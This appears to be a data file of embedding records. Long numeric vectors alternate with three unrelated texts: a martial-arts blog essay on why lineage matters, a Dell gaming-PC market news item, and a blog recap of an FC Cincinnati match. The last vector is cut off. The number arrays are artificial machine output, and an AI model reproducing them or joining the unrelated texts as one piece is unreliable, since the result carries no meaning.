[ -0.012069043703377247, -0.005319745279848576, 0.03374846279621124, 0.044544368982315063, -0.05304945260286331, -0.009555991739034653, 0.00969742052257061, -0.011923693120479584, 0.03148733451962471, 0.05961395427584648, 0.015798555687069893, -0.021928157657384872, 0.10641825944185257, -0.1186717078089714, -0.018366117030382156, 0.01277814619243145, -0.003962900023907423, -0.022156493738293648, -0.031154900789260864, 0.03616435080766678, 0.006896492559462786, -0.08937637507915497, 0.01030944287776947, 0.009161952883005142, 0.01847137324512005, -0.02449546754360199, -0.037949349731206894, 0.010851518251001835, 0.02564130164682865, 0.01793500781059265, -0.01631537452340126, -0.0034033150877803564, -0.007161951623857021, -0.04023375362157822, -0.0008274425053969026, -0.023114237934350967, 0.041864678263664246, -0.007353653199970722, 0.024456745013594627, 0.05844787508249283, 0.052995115518569946, -0.0014700144529342651, -0.016070770099759102, 0.024876104667782784, -0.029579147696495056, 0.053192928433418274, -0.07074180990457535, 0.029859406873583794, 0.009362105280160904, -0.04912533611059189, 0.09261628985404968, -0.043808866292238235, 0.026201467961072922, 0.004496975801885128, 0.02086080238223076, -0.019106540828943253, -0.052275460213422775, -0.04965975508093834, 0.0780683308839798, 0.051951803267002106, -0.01996106468141079, 0.03430768847465515, 0.023434864357113838, 0.007897859439253807, -0.08730567246675491, -0.06343231350183487, 0.009158212691545486, 0.005021664779633284, -0.02901116944849491, -0.015340106561779976, 0.0003297658113297075, 0.06030579283833504, -0.12328116595745087, 0.015043816529214382, 0.013694096356630325, -0.005442508030682802, -0.029463250190019608, 0.015732187777757645, -0.10430733859539032, -0.10688241571187973, -0.016535930335521698, -0.1423453688621521, 0.04271842539310455, 0.10184746235609055, 0.03117355704307556, -0.046018876135349274, 0.0143424142152071, -0.05896586924791336, 0.03811771050095558, -0.0018861789721995592, -0.008982237428426743, -0.016471609473228455, -0.03210856020450592, 0.10375132411718369, 0.04335407540202141, -0.0331219844520092, 0.005335742607712746, 0.020194966346025467, -0.01719428040087223, 0.035340745002031326, -0.05980204790830612, 0.012257284484803677, 0.05919494107365608, 0.012191194109618664, -0.04357299953699112, -0.025411998853087425, -0.005387942772358656, 0.01929398626089096, -0.0029263750184327364, -0.026201071217656136, 0.006723261903971434, -0.053562231361866, 0.09803920239210129, 0.03080563433468342, -0.018034210428595543, -0.03193526715040207, 0.04340202733874321, -0.04522523656487465, -0.037793729454278946, -0.035126443952322006, -0.03845728188753128, 0.031531549990177155, -0.07389507442712784, -0.038924574851989746, -0.016569077968597412, -0.07152675837278366, 0.007390454411506653, 1.3282739944471333e-33, -0.1121566966176033, 0.04138658940792084, 0.023659341037273407, 0.13793203234672546, 0.02153395675122738, 0.0066007208079099655, 0.042079221457242966, -0.005937792826443911, 0.029508404433727264, -0.06349833309650421, 0.009488657116889954, -0.09059394896030426, -0.10307241231203079, -0.03836311772465706, -0.05991503968834877, 0.02216782048344612, 0.07687565684318542, 0.03930412605404854, -0.027266284450888634, 0.020082855597138405, 0.07848037034273148, 0.0887310802936554, 0.051738567650318146, 0.02933870069682598, -0.00034075710573233664, 0.014492896385490894, -0.005405256524682045, -0.039337798953056335, 0.007477762643247843, 0.007275640964508057, -0.024932628497481346, -0.019757824018597603, 0.07720135897397995, -0.05645470693707466, 0.04827210307121277, 0.05245507135987282, 0.08050321787595749, -0.06992530822753906, -0.039086926728487015, 0.13857489824295044, 0.007340655196458101, -0.09088852256536484, 0.051792677491903305, 0.004295500926673412, -0.04197936877608299, 0.05553996562957764, -0.04849129170179367, -0.011604259721934795, 0.02833118475973606, 0.06845693290233612, -0.0225897915661335, 0.0483989492058754, -0.09780556708574295, -0.002912480616942048, -0.03513043001294136, 0.0628286600112915, -0.05517542362213135, -0.06538068503141403, -0.052360761910676956, -0.0322006419301033, 0.07350470125675201, -0.005994721781462431, -0.05134771391749382, -0.0313282310962677, -0.07298772037029266, -0.015295140445232391, 0.0687914714217186, 0.020992020145058632, -0.028365885838866234, -0.002340788021683693, -0.007496137171983719, 0.0747564360499382, -0.037697240710258484, -0.03579186648130417, 0.09747572988271713, 0.07554610073566437, -0.059674911201000214, 0.02505148947238922, 0.04041857272386551, -0.06873820722103119, 0.03286946564912796, -0.04895126819610596, -0.08711839467287064, -0.011548876762390137, 0.0542302243411541, -0.1112489178776741, 0.0694938525557518, -0.00029925955459475517, 0.03662391006946564, -0.005300319287925959, -0.008498010225594044, 0.0037418317515403032, 0.0010488105472177267, -0.09499641507863998, -0.07352474331855774, -3.161956376805117e-33, 0.0027139177545905113, 0.007870952598750591, 0.06717690825462341, 0.07037065923213959, 0.0973106324672699, 0.0351300872862339, 0.02511598914861679, 0.013536936603486538, 0.06572616845369339, 0.008804114535450935, -0.005382009316235781, -0.05928068235516548, 0.04318132996559143, -0.016243217512965202, -0.08180870115756989, -0.017408067360520363, 0.036517031490802765, -0.03256428241729736, -0.04506915062665939, -0.06681042164564133, -0.08195233345031738, -0.04713718593120575, -0.030685530975461006, 0.0011803575325757265, -0.017456093803048134, 0.08170892298221588, -0.037464480847120285, -0.02264859341084957, -0.010160606354475021, 0.10282998532056808, -0.009557393379509449, -0.015128311701118946, 0.03864248842000961, 0.09249681979417801, -0.03948623687028885, 0.08203449845314026, 0.011182757094502449, 0.10454351454973221, 0.024906009435653687, 0.0359378345310688, -0.08301132172346115, -0.13445545732975006, -0.01010963972657919, -0.012251832522451878, -0.016204698011279106, 0.028309904038906097, 0.04768604785203934, 0.04705397039651871, 0.047780100256204605, -0.017220744863152504, 0.031157907098531723, 0.11895862221717834, -0.05423716828227043, 0.11082066595554352, 0.01887173019349575, -0.020571401342749596, -0.016070321202278137, 0.005582958925515413, -0.008533140644431114, -0.012257881462574005, 0.006357540842145681, 0.051327724009752274, -0.07388461381196976, -0.03601048141717911, -0.013129113242030144, -0.019030479714274406, -0.0874648168683052, -0.035568151623010635, -0.0007682760478928685, -0.05252205953001976, 0.01992178149521351, -0.04003801569342613, -0.01656409725546837, -0.0030363979749381542, -0.019255002960562706, 0.0008334238082170486, -0.023534681648015976, -0.056085024029016495, -0.010544981807470322, 0.01127577293664217, -0.08128402382135391, -0.068647101521492, 0.035400569438934326, -0.0063443356193602085, -0.03907206654548645, 0.02012837864458561, 0.04115511476993561, -0.10626161843538284, 0.01840958744287491, -0.05425979942083359, -0.02596667781472206, 0.020331090316176414, 0.030015718191862106, -0.06629956513643265, 0.051267314702272415, -4.704839540181638e-8, -0.011800680309534073, 0.09144752472639084, -0.03966997191309929, -0.04044176638126373, -0.012272482737898827, -0.14466515183448792, -0.008374473080039024, 0.11294499039649963, 0.02919468656182289, 0.07382535934448242, -0.14242757856845856, 0.08177518099546432, 0.05020710453391075, -0.037635497748851776, 0.07321308553218842, 0.000225966825382784, 0.01600683107972145, -0.059872888028621674, 0.012829137034714222, -0.020446471869945526, 0.04742623493075371, 0.030241820961236954, -0.01760854758322239, -0.10106708854436874, 0.01197629701346159, -0.06997013092041016, -0.03638694807887077, 0.03487703204154968, -0.08987565338611603, -0.013312180526554585, 0.08073564618825912, -0.012468780390918255, -0.07603069394826889, -0.0630059465765953, 0.029953110963106155, 0.03898929804563522, -0.006980187725275755, -0.01648043841123581, 0.051055219024419785, -0.04756738618016243, 0.02132466807961464, -0.025762001052498817, 0.04664104804396629, 0.043507013469934464, 0.06492050737142563, 0.025485027581453323, 0.02624508924782276, 0.02349793165922165, 0.009653729386627674, 0.053034357726573944, 0.02302566170692444, 0.05229519307613373, 0.00025727172032929957, 0.027249857783317566, -0.024990316480398178, -0.039436329156160355, -0.07459190487861633, 0.07588028907775879, 0.07567442953586578, 0.06882057338953018, -0.02190723456442356, 0.01769419014453888, 0.0906931683421135, -0.027278386056423187 ]
We all know a guy like this. He spends his day on the internet telling and re-telling stories about how his martial ancestors were the toughest fighters in the world. We hear a bunch of stories about the ancestors and they all seem to imply or outright assert that their awesomeness gives the lineage snob the right to talk trash about other arts. These guys are universally despised and, as a general rule, suck at martial arts. Too much time on the keyboard and not enough training. But what if we understood that, while those guys suck, the need for lineage is real and can provide fantastic yardstick to gauge a school or martial artist? There are going to be 2 basic responses to that statement. The first usually comes from people who have created their own arts or know that their teachers weren't totally legit. Their response goes something like, "All you do is talk about lineage! Why are you judging me?? Bruce Lee said to follow your own path!!" Etc. The other response is "I told you so!!!" and is almost as obnoxious as the first. This response usually comes from the lineage snobs I mentioned before and, remember, we all hate those guys. But both of those people are wrong and both know it deep down inside. Lineage in martial arts has existed for a thousand years for very good reasons. It's a solid gauge of the effectiveness of the art itself and also proof that there is a complete method for teaching and transmitting the art. Effectiveness in usage and proof that the method can produce a strong next generation are vital, obviously and those are two really powerful reasons to care about lineage and they are also more laid back than a lot of people realize. Let's use medical care as a simile here. If you had a terrible disease and you had to pick a doctor for treatment, would you care where that doctor's education came from? If your options were a Harvard graduate who has done extensive post-grad education in an effort to be on the forefront of medicine, or someone​ who took some courses at the community college and then spent some time surfing WebMD, which would you pick? More than likely, you would pick the doctor most prepared and able to save your life. He would know the latest treatments and the best medicines to use. A doctor that provides a cure for disease is in some ways similar to a martial arts teacher who provides a way for you to protect yourself and your family - you want to choose the best, either way (well, if you have any common sense that is). Why is the Harvard doctor the wiser choice? It has to do with his knowledge, the work he put in to gain that knowledge, and his ability to apply that knowledge to saving your ​life. To obtain that piece of paper on his wall, doctors who graduate from Harvard have to complete years of incredibly intense education, a program that is so tough that only 3.3% of applicants are even accepted. Graduates go through long, sleepless nights where they work alone or with their classmates trying to understand important ideas and learn how to apply them. They make massive sacrifices, both in time and money, and understand that they will be responsible for other lives as a result of earning their degree. This makes the guy that took a few classes at community college and surfed WebMD look like a ridiculous choice. His education is directed by what disease catches his eye, not a master instructor who has spent years honing his ability to communicate important ideas and practices. Because of this lack of focused instruction he is often unable to help at all, he just doesn't have the basic tools needed to begin. Let's use another example from the internal martial arts to see if we can clarify even further. Everyone who has read any sort of IMA text knows about the Kua, right? The Kua is also called the inguinal crease, the section of the torso between the lower abdomen and the thigh. All IMA teachers talk about the Kua but the self-taught teachers don't know that they show their lack of knowledge as they do. Teachers without a good lineage will talk about how it's the source of power in Gong Fu but can't explain how or why it works, or even what muscles are involved in using the Kua. Meanwhile, properly taught teachers can explain exactly how the kua works and why. They know that the muscles that run through the Kua tie directly to the lower spine and pelvis, providing a strong path for force generated from the core to travel to the ground and back. They can also provide a plethora of smaller exercises to develop this area and can easily explain the concept without using a slew of esoteric terms that the student doesn't understand. I could go on and on with different examples of how lineage provides a great indicator of the quality of both the art and the teacher but, instead, I would like to provide some thoughts or ideas from other teachers. Here is what Byron Jacobs has to share, Byron is the top tudi for Master Di Guoyong in Beijing.
[ -0.0023846225813031197, 0.026813078671693802, 0.03207622841000557, -0.007121805101633072, 0.029149606823921204, 0.012592741288244724, -0.03784029930830002, -0.0048714932054281235, 0.04209711402654648, -0.0377960279583931, -0.002409815788269043, -0.11519031226634979, 0.04686213284730911, -0.013226471841335297, -0.05858025699853897, 0.027950361371040344, 0.0024015852250158787, 0.0024186065420508385, -0.024547211825847626, 0.022402148693799973, -0.022966910153627396, 0.06876406818628311, 0.07632359862327576, 0.03315351530909538, -0.03991454094648361, -0.02187409996986389, 0.037302132695913315, -0.001860405900515616, -0.03898027911782265, 0.02052970603108406, -0.006805923767387867, 0.006668320391327143, 0.022298352792859077, 0.02924095094203949, -0.04404772073030472, 0.019819950684905052, 0.04271050915122032, 0.13177889585494995, -0.025745145976543427, -0.004855363164097071, -0.06130719184875488, 0.07704455405473709, 0.07342939078807831, 0.012372452765703201, 0.08607329428195953, -0.030566206201910973, 0.007357601076364517, -0.04475286230444908, -0.05041815713047981, 0.019590890035033226, -0.012208972126245499, -0.05405460670590401, 0.09291421622037888, 0.010443110018968582, 0.03692859411239624, 0.05469990521669388, 0.0051640719175338745, 0.03541024029254913, 0.005323784425854683, 0.14663270115852356, -0.029237596318125725, 0.005581231322139502, -0.018413709476590157, -0.04811572656035423, -0.028970761224627495, -0.02385711669921875, 0.05491163209080696, 0.10617111623287201, -0.06746131926774979, 0.030355429276823997, -0.0102143045514822, -0.006792043801397085, -0.010515703819692135, 0.11249325424432755, -0.006049858871847391, 0.059220101684331894, -0.029815562069416046, 0.01553257368505001, -0.028734995052218437, -0.10087719559669495, 0.058078594505786896, 0.023769516497850418, -0.041167549788951874, -0.040760282427072525, 0.04280804097652435, -0.019331689924001694, 0.003665278432890773, -0.07922407239675522, 0.04321303963661194, 0.013441450893878937, 0.03364696353673935, -0.024623524397611618, 0.04448612034320831, 0.04328243061900139, 0.14613968133926392, 0.03177999332547188, 0.04125206917524338, -0.021329956129193306, -0.03477444127202034, 0.027599092572927475, -0.013892565853893757, 0.0018505161860957742, -0.020793303847312927, 0.0023381777573376894, 0.024233128875494003, -0.028384417295455933, -0.04754715412855148, -0.012522934004664421, -0.04508558288216591, 0.032600440084934235, -0.011098277755081654, 0.002551562851294875, -0.13359616696834564, 0.015085241757333279, 0.05343049392104149, 0.008530213497579098, 0.04445841535925865, -0.011921117082238197, -0.10424471646547318, -0.052886344492435455, -0.058152660727500916, 0.020423535257577896, -0.059735752642154694, 0.03914646804332733, 0.07825019955635071, -0.061047691851854324, -0.10406241565942764, 5.4656218799374946e-33, 0.10101108998060226, 0.08509911596775055, -0.03566398099064827, 0.056827057152986526, -0.0813913494348526, -0.0672709047794342, -0.005739765707403421, -0.07353177666664124, -0.016177793964743614, 0.07640726119279861, -0.0429685078561306, 0.058849602937698364, -0.004962917882949114, 0.01795841008424759, 0.0373493991792202, 0.09018129110336304, -0.13353252410888672, -0.05903630331158638, 0.016302503645420074, -0.021046506240963936, -0.00022407752112485468, 0.07295940071344376, -0.05471787229180336, -0.05340776592493057, -0.07298149913549423, -0.038944587111473083, 0.001192824449390173, -0.015479505993425846, -0.06375542283058167, -0.005984779912978411, -0.08291001617908478, -0.11572548747062683, -0.013442334719002247, -0.06450899690389633, 0.05746765062212944, -0.07934625446796417, 0.0810636430978775, -0.004032989498227835, 0.009268127381801605, 0.029283840209245682, 0.032306648790836334, 0.00043800490675494075, -0.07894732058048248, -0.006214223802089691, 0.055445022881031036, 0.033894672989845276, 0.039069272577762604, -0.10744083672761917, -0.06137002259492874, -0.00531771732494235, -0.003737981431186199, 0.04321414977312088, 0.14267951250076294, 0.06603728234767914, -0.0002674935385584831, -0.047124557197093964, -0.05091559886932373, 0.0217167679220438, -0.014588115736842155, -0.07193204015493393, 0.0316055528819561, -0.03700229898095131, -0.03883674368262291, 0.06437470763921738, 0.012366751208901405, -0.05994557961821556, -0.054091185331344604, 0.08701083064079285, -0.006185740698128939, -0.05526084080338478, 0.04903898388147354, -0.03431282937526703, -0.06525345146656036, -0.13058145344257355, 0.020394453778862953, -0.03480503335595131, 0.02466370165348053, 0.09003234654664993, 0.04236586391925812, -0.06116729974746704, 0.03424938768148422, 0.034861791878938675, -0.0881793200969696, -0.015162120573222637, 0.03485909476876259, 0.014441101811826229, 0.018376344814896584, -0.016943637281656265, 0.08302737027406693, 0.07687898725271225, -0.04755794256925583, -0.05953791365027428, 0.008864378556609154, 0.023831985890865326, -0.006354158744215965, -6.279914734742925e-33, 0.01706991158425808, 0.03353607654571533, 0.06943535804748535, 0.010028235614299774, 0.03591208532452583, -0.05417083576321602, -0.039903707802295685, 0.11424798518419266, -0.00488236965611577, -0.022923467680811882, 0.0157525222748518, 0.0016655788058415055, 0.022615695372223854, -0.039431534707546234, 0.05473804473876953, -0.09882462024688721, 0.002703028731048107, 0.05912639573216438, -0.03976695239543915, 0.012390290386974812, 0.1395103931427002, 0.03179256245493889, -0.07024875283241272, -0.1001036986708641, -0.07440876960754395, 0.041527796536684036, -0.018828345462679863, 0.07129921019077301, -0.02856561355292797, 0.023556509986519814, 0.006831254810094833, -0.005205168854445219, 0.04526229947805405, -0.026984283700585365, 0.059631429612636566, 0.013622449710965157, -0.049871478229761124, 0.04843948036432266, -0.046270422637462616, 0.016998035833239555, -0.05762265622615814, 0.010252276435494423, -0.1153937354683876, -0.047449249774217606, 0.0007137046195566654, -0.021761387586593628, 0.02963193692266941, -0.01802830956876278, 0.021515365689992905, -0.008382599800825119, -0.02759738638997078, 0.02781226485967636, 0.07069721817970276, 0.005325306672602892, 0.02445625513792038, -0.08451704680919647, 0.10061048716306686, 0.008085263893008232, -0.020302435383200645, 0.07611337304115295, -0.01818850450217724, -0.0028601663652807474, -0.031112367287278175, -0.007814668118953705, 0.019598810002207756, 0.008434931747615337, -0.020249463617801666, 0.06040598079562187, -0.04807928577065468, -0.016613492742180824, -0.03820260986685753, -0.04363805055618286, -0.003330530831590295, -0.01931825466454029, -0.03183940052986145, 0.028038300573825836, -0.006476158741861582, -0.032421696931123734, 0.017023660242557526, 0.0045121512375772, -0.01416707318276167, -0.07655858248472214, -0.006442631594836712, 0.000016377120118704624, 0.05834510177373886, 0.05542033910751343, -0.0648828074336052, 0.04680480808019638, 0.09388582408428192, -0.031553592532873154, 0.10186313092708588, -0.14507105946540833, 0.008217995055019855, -0.07827028632164001, -0.08549538999795914, -5.762375820950183e-8, -0.11360475420951843, 0.02885163389146328, 0.022946299985051155, 0.08415046334266663, -0.01567576266825199, 0.06410406529903412, -0.03511969372630119, 0.026340322569012642, 0.028647780418395996, 0.028393685817718506, 0.014271905645728111, 0.05122647434473038, -0.05006123334169388, -0.041541483253240585, 0.05281076952815056, 0.02110188454389572, -0.04364602640271187, -0.04905858635902405, -0.010442635044455528, -0.03255188837647438, 0.007930122315883636, -0.03762265294790268, 0.06844539940357208, 0.015895195305347443, -0.09178076684474945, -0.04987188056111336, -0.07159938663244247, -0.04933953285217285, -0.003751311218366027, 0.04154999554157257, -0.01699587143957615, 0.014602593146264553, -0.05150860175490379, 0.005772131495177746, 0.023605192080140114, 0.011038423515856266, -0.04437799006700516, -0.05899506062269211, 0.03584139421582222, 0.015204803086817265, -0.07487688958644867, -0.05055265873670578, 0.06584428250789642, 0.01730840839445591, 0.04448828101158142, -0.00733637809753418, -0.008369619958102703, 0.00798856746405363, 0.005729207303375006, 0.017866339534521103, -0.010035042650997639, -0.05716124549508095, -0.02763080969452858, 0.02031523920595646, -0.0038680413272231817, 0.035576459020376205, 0.0012550053652375937, 0.04721877723932266, -0.0622364804148674, 0.045355331152677536, 0.10843540728092194, -0.043032336980104446, -0.009548602625727654, -0.008877730928361416 ]
The guy who oversees consumer PC roadmaps for both notebooks and desktops at Dell believes that the gaming PC market will be growing in a big way for at least a couple of years. The two main contributing factors are allegedly eSports and VR gaming. I guess we will be seeing more Alienware and XPS stuff coming their way. In contrast to shrinking overall PC sales, global demand for gaming PCs is heating up and the boom will continue over the next five years, according to Consumer Product Marketing senior vice president Raymond Wah under Dell Technologies. Electronic sports (e-sports) and VR (virtual reality) are main growth drivers for gaming PCs, Wah said, adding gaming is becoming e-sports and this is a global trend. Continual gaming content updates push hardware developers to upgrade the specifications of gaming PCs, Wah indicated. The number of e-sports fans will increase to 145 million in 2017. Discussion
[ 0.042585358023643494, -0.0017463401891291142, 0.03204626217484474, -0.059561509639024734, 0.05144866183400154, 0.011359162628650665, -0.028165094554424286, -0.005637251306325197, 0.0400828942656517, 0.04774058610200882, -0.03610889986157417, 0.040816593915224075, 0.03833142668008804, -0.0005496584926731884, 0.13185197114944458, 0.006141053978353739, 0.026875391602516174, -0.0853571817278862, -0.01188521459698677, 0.021704768761992455, -0.0485246516764164, -0.06278767436742783, -0.037678979337215424, -0.006603211630135775, -0.042452987283468246, -0.01666657254099846, 0.02165190689265728, 0.013684733770787716, -0.07209595292806625, 0.011039186269044876, -0.02805352210998535, 0.09144790470600128, 0.010678754188120365, 0.07389739155769348, -0.027340922504663467, -0.05771860107779503, -0.03084108792245388, -0.04608481004834175, -0.05747654289007187, -0.047724563628435135, -0.03789820522069931, -0.07141762971878052, -0.04153912514448166, 0.06295505911111832, 0.08927492797374725, -0.025752898305654526, -0.02756080962717533, 0.00199289177544415, -0.006502499803900719, -0.023232344537973404, -0.0374235175549984, -0.019677745178341866, 0.07442675530910492, -0.011695953086018562, -0.017606236040592194, -0.03898925334215164, -0.003630888182669878, 0.026442578062415123, 0.04684922471642494, 0.027588199824094772, 0.08712296932935715, -0.07203590869903564, -0.004479050636291504, 0.04001941904425621, -0.03418707847595215, -0.03100053034722805, 0.0305644441395998, 0.03893096372485161, -0.05408952757716179, 0.015944913029670715, -0.008705933578312397, 0.020520061254501343, -0.022493507713079453, -0.02799459733068943, 0.014377486892044544, 0.005700261797755957, -0.016165507957339287, -0.0024875947274267673, 0.07790741324424744, 0.06227293238043785, 0.05312664434313774, -0.01823258586227894, -0.03248380869626999, -0.03678704425692558, -0.05345482751727104, 0.03790760040283203, -0.03193605691194534, -0.012016919441521168, -0.0692715048789978, -0.021316640079021454, -0.026743846014142036, 0.02115740068256855, 0.008154166862368584, 0.09614283591508865, -0.01999928429722786, 0.01562652364373207, -0.046973492950201035, -0.10223255306482315, 0.037307076156139374, 0.02118878811597824, -0.016817566007375717, 0.05105283111333847, 0.11082849651575089, 0.061494916677474976, -0.057561926543712616, -0.027702869847416878, 0.00844353437423706, 0.057939156889915466, -0.0226060152053833, -0.0003237883502151817, -0.09698261320590973, 0.018330413848161697, -0.08182219415903091, -0.046170130372047424, 0.006950392387807369, 0.08774136006832123, 0.024690823629498482, 0.09302870184183121, 0.028346974402666092, 0.08663681149482727, 0.012770641595125198, 0.054705992341041565, -0.02336542308330536, 0.05519479140639305, 0.05392393842339516, -0.00930879544466734, -0.09618064016103745, 4.05398026492661e-33, -0.075952909886837, 0.019702941179275513, 0.0031873509287834167, 0.03618635609745979, -0.0473129078745842, 0.05222253128886223, 0.07249653339385986, -0.03239106759428978, -0.007037903182208538, -0.07480167597532272, -0.04080723598599434, 0.0879848375916481, 0.0043918113224208355, 0.0834219679236412, 0.11037452518939972, -0.11480264365673065, -0.03216547891497612, -0.008429370820522308, 0.004826655611395836, -0.026939978823065758, 0.035639602690935135, -0.04444621875882149, 0.042490944266319275, 0.018881671130657196, -0.03862050920724869, -0.0371895395219326, -0.07745295763015747, 0.017820902168750763, 0.026198653504252434, 0.016993241384625435, 0.006290355231612921, -0.05808000639081001, -0.024217771366238594, -0.0883556678891182, 0.0020708683878183365, 0.004080425016582012, 0.011658345349133015, -0.0355742909014225, 0.06680665165185928, 0.009970835410058498, -0.039182860404253006, 0.06972813606262207, -0.11035757511854172, -0.08452160656452179, -0.06298229098320007, 0.04301704093813896, -0.008002630434930325, -0.07801061123609543, -0.08752251416444778, -0.013100053183734417, -0.05656614154577255, 0.04295618087053299, 0.004728653468191624, -0.03484485298395157, -0.029718097299337387, -0.03659415245056152, 0.041496675461530685, -0.07495278865098953, 0.03270435333251953, -0.013132501393556595, -0.013750355690717697, 0.013643082231283188, 0.007159098517149687, -0.023468533530831337, -0.04679519310593605, 0.07420478761196136, 0.19857703149318695, 0.06681548058986664, -0.10683432221412659, 0.08554308116436005, 0.08695511519908905, -0.042997416108846664, -0.07958719879388809, -0.04310088977217674, 0.04571616277098656, 0.01741449534893036, -0.07982658594846725, -0.07379216700792313, 0.025172831490635872, 0.06482389569282532, -0.05444702133536339, 0.023522932082414627, -0.0363578274846077, -0.06368287652730942, 0.04496556147933006, -0.011942489072680473, -0.035492997616529465, -0.021157322451472282, 0.09259113669395447, -0.014674311503767967, -0.05242379754781723, -0.040331415832042694, 0.030070437118411064, 0.08397519588470459, 0.00040185428224503994, -5.2619164231216694e-33, -0.07719030231237411, 0.021342342719435692, -0.03714628890156746, 0.06485133618116379, -0.009971540421247482, -0.06900937855243683, 0.022125082090497017, 0.006151482928544283, 0.04559662565588951, -0.012251446954905987, -0.026346193626523018, 0.05997348576784134, -0.001379111548885703, 0.090304896235466, -0.022814327850937843, -0.028274621814489365, 0.03206522390246391, -0.019495146349072456, 0.026069791987538338, 0.0023583127185702324, -0.010294110514223576, -0.04088810831308365, -0.023947101086378098, -0.0217613372951746, -0.008039670065045357, 0.022234462201595306, -0.021583830937743187, -0.03683895990252495, 0.01295375730842352, -0.006273798178881407, -0.02823294699192047, -0.033541854470968246, 0.06873205304145813, 0.07543827593326569, 0.11380098015069962, -0.008634945377707481, 0.05099492520093918, -0.03690606355667114, 0.004640435799956322, -0.0342320092022419, 0.04920442774891853, 0.013294616714119911, -0.002590412274003029, -0.02559412084519863, 0.056018322706222534, 0.05455807223916054, 0.020127521827816963, -0.011695955879986286, 0.04453041031956673, -0.007748851552605629, 0.08584606647491455, 0.056599702686071396, -0.02801748551428318, -0.028203900903463364, -0.060041628777980804, -0.022896384820342064, -0.05585857108235359, 0.07315851747989655, -0.0436408556997776, -0.03265029937028885, 0.030557427555322647, 0.061133820563554764, -0.08160059154033661, -0.008352781645953655, 0.035025257617235184, 0.019744865596294403, 0.03537642955780029, 0.0039952704682946205, -0.013634721748530865, -0.13292640447616577, -0.0006141387275420129, -0.04010165482759476, -0.1263136863708496, -0.023346401751041412, -0.20754513144493103, -0.004720909986644983, 0.037600379437208176, 0.0021694565657526255, 0.04724232852458954, -0.0015280658844858408, -0.017451832070946693, 0.037597063928842545, 0.05681435763835907, -0.02699916809797287, -0.06489118188619614, -0.03344196826219559, -0.009312889538705349, -0.03744232654571533, -0.09691058099269867, 0.00043646671110764146, -0.014567802660167217, 0.0003155101148877293, -0.07484855502843857, 0.007436931133270264, -0.048794060945510864, -4.446349066711264e-8, -0.003932148218154907, -0.07252474129199982, 0.015237748622894287, 0.04376398026943207, 0.05072280019521713, -0.04489251971244812, 0.08667448908090591, 0.004724403843283653, 0.12645091116428375, 0.06345222890377045, 0.052502185106277466, -0.03390589356422424, 0.053407326340675354, 0.005604398902505636, 0.09137224406003952, 0.0792023167014122, -0.0551755465567112, 0.013266625814139843, 0.008546373806893826, 0.013664870522916317, 0.03962332010269165, 0.08171946555376053, 0.12533406913280487, -0.008664325810968876, -0.021346470341086388, -0.013889705762267113, -0.06200353801250458, -0.017743492498993874, -0.014663494192063808, -0.02275395393371582, 0.0024963945616036654, -0.054698072373867035, 0.01876685582101345, -0.07283155620098114, 0.02496446669101715, -0.044423218816518784, 0.023303966969251633, 0.021167516708374023, 0.094931960105896, 0.0028037361335009336, -0.07758082449436188, -0.07143564522266388, 0.013405809178948402, -0.0013947623083367944, 0.02892519161105156, -0.0591561459004879, -0.06018766015768051, -0.03763356804847717, -0.010363264009356499, -0.03250019997358322, -0.04675605520606041, 0.026049641892313957, 0.03603191301226616, -0.019345859065651894, -0.007758584804832935, 0.009046235121786594, -0.036095231771469116, 0.06543010473251343, 0.04402625188231468, -0.025216741487383842, -0.016570577397942543, -0.10498803853988647, -0.00009440306894248351, 0.07585824280977249 ]
We grabbed an Uber and headed up to UC early again to have a couple of pre-game happy hour beers at The St. Clair. What a difference a week makes with the weather. The area was absolutely buzzing with activity in a sea of blue and orange… After a couple of beers, we made the short walk over to Nippert Stadium… FC Cincinnati was playing host to Louisville City FC in what has been dubbed the River Cities Cup. But a lot of the fans have started calling it The Dirty River Derby, which I really like a whole better. With Louisville being just a hop-ship-and-a-jump down I-71, it makes sense that a rivalry has already started to form. Here we go… GOAL FC|C! 1-0! Louisville City was awarded what I thought was a pretty cheap penalty when the ball bounced up and brushed an FC|C defender’s hand in the box… 1-1. And it all kind of went downhill from there pretty quickly… Louisville City were reduced to 10 men just before the end of the half on a second bookable offense… It was just a gorgeous night for football… And there was such an incredible atmosphere at tonight’s match. Nippert was rocking all evening despite FC|C playing from behind for most of the match… FC Cincinnati managed to pull a goal back in just before the 90th minute. We headed out just before the end of injury time. And the match ended 3-2 to Louisville City… But FC Cincinnati set a new USL regular season attendance record at tonight’s match!! I think that Cincinnati is definitely embracing their new sports team! FC Cincinnati’s next home match is against Wilmington on April 30th, which happens to be the five-year anniversary of our very first date. See you at Nippert! 🙂
[ -0.02341124787926674, 0.04809589311480522, 0.09333190321922302, -0.043134432286024094, -0.005760096944868565, 0.04339560121297836, -0.044375400990247726, 0.015961576253175735, 0.032971516251564026, -0.005537515971809626, -0.080036960542202, -0.06768959015607834, -0.038242701441049576, 0.00036979527794755995, -0.054392848163843155, 0.0031903607305139303, 0.04480971395969391, -0.04395333677530289, -0.044185809791088104, 0.030300240963697433, -0.06682329624891281, -0.04664849862456322, -0.031647808849811554, -0.017048977315425873, -0.016459202393889427, 0.04456944391131401, 0.021312329918146133, 0.0762798860669136, -0.021611183881759644, -0.09435777366161346, -0.033205848187208176, 0.010443778708577156, 0.06162041425704956, -0.05720258504152298, 0.030684664845466614, -0.07004978507757187, -0.0014844994293525815, -0.033296167850494385, 0.041243959218263626, 0.06463369727134705, 0.05873560160398483, -0.0405346117913723, 0.015991972759366035, 0.1030258908867836, -0.047322697937488556, 0.0553421676158905, 0.049735166132450104, 0.008810163475573063, -0.0038116546347737312, 0.019167466089129448, 0.04482017084956169, 0.0712672621011734, 0.05589449033141136, 0.015483221039175987, 0.018257873132824898, 0.11838804185390472, -0.006402082275599241, 0.046477075666189194, 0.00319573562592268, 0.028557348996400833, -0.02196618542075157, 0.05715731903910637, -0.022379273548722267, 0.03247245401144028, -0.03422088548541069, -0.06596094369888306, -0.09326575696468353, 0.12018358707427979, 0.06359214335680008, 0.025547504425048828, 0.08102745562791824, -0.06161798909306526, 0.0060987770557403564, -0.021808400750160217, 0.09129855781793594, 0.07537151873111725, 0.005253409966826439, 0.01122516393661499, 0.008167077787220478, -0.021526707336306572, -0.0011494553182274103, -0.01830543577671051, 0.04337894916534424, -0.03727122023701668, 0.030657460913062096, 0.0035101380199193954, 0.0025643601547926664, -0.005715357605367899, 0.07111836969852448, -0.013769155368208885, -0.05326123163104057, -0.047597307711839676, 0.021509476006031036, -0.06910475343465805, 0.04199649766087532, 0.04484391212463379, -0.035770807415246964, -0.029650241136550903, 0.029079383239150047, 0.05505819991230965, 0.020794348791241646, 0.12140187621116638, 